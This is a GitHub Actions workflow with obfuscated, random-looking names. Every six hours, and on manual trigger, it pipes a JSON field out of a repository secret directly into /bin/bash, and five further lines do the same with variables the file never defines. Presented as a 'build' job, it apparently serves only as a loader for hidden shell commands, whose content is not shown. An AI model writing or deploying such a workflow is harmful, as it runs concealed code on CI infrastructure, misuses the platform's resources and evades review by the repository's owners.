name: dongxinchang5647

on:
  workflow_dispatch:
  schedule:
    - cron: '42 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongxinchang5647
        env:
          g9344: ${{ secrets.g9344 }}
        run: |
          echo $g9344 | jq -r .yuqs6340 | /bin/bash
          echo $f2412 | jq -r .kb7 | /bin/bash
          echo $bwdrx0 | jq -r .nvxl0 | /bin/bash
          echo $x9 | jq -r .chd9662 | /bin/bash
          echo $ub44369 | jq -r .qwei9 | /bin/bash
          echo $d1663 | jq -r .scc35 | /bin/bash

